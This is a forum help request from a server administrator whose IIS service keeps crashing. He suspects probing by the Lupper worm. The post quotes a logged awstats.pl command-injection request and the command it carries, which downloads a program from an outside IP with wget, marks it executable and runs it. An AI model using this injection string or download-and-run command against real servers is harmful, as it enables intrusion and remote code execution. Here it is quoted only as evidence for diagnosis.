Lupper worm taking down IIS?

From reading around material previously posted in this forum, I think we're having a problem with the Lupper worm.

The IIS service on one of our web servers is repeatedly crashing with symptoms similar to those previously described by ChadM appearing in the stats:
The command it runs is:
|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen 216.102.212.115;echo YYY;echo|

It is passed to awstats.pl in a request like:
GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bc hmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e 212%2e115;echo%20YYY;echo| HTTP/1.1
When the service crashes, the event log gets filled up with multiple error messages advising that:
Code: 
The script started from the URL '/blog/xmlsrv/xmlrpc.php' with parameters '' has not responded within the configured timeout period.
The error message does not vary, but the location (and to an extent, the name) of the URL varies somewhat; while it is always "xmlrpc", the filename extension and the directory varies a little.

However, Lupper is a Linux worm, so I rather doubt that the problem is we're actually infected with it. Furthermore, we've run four different virus scans on the machine and found nothing of particular relevance to this issue (a few infected user mailboxes, that's about it). None-the-less, we're getting hammered by what appears to be symptoms of a virus that shouldn't be able to infect us, and I'm running out of ideas for what we can do.

My working theory is that what's happening is that infected machines are trying to infect us, are failing, but achiving a de facto DOS on our web service. We have both PHP (4.2.3) and Perl installed on the server, but from reading around, it seems that the exploit is within particular individual scripts, not those services themselves, and in any instance, I've read no reports of windows servers running those services being affected. Can it really just be as simple as trashing PHP and Perl until the storm dies down? I really don't like to do that, but I'm running out of options.

Can anyone offer suggestions, explanation or possible resolutions? We have a couple of hundred sites hosted on that server, and this is becoming a really serious problem. TIA,

Simon

 

 

 

 

Top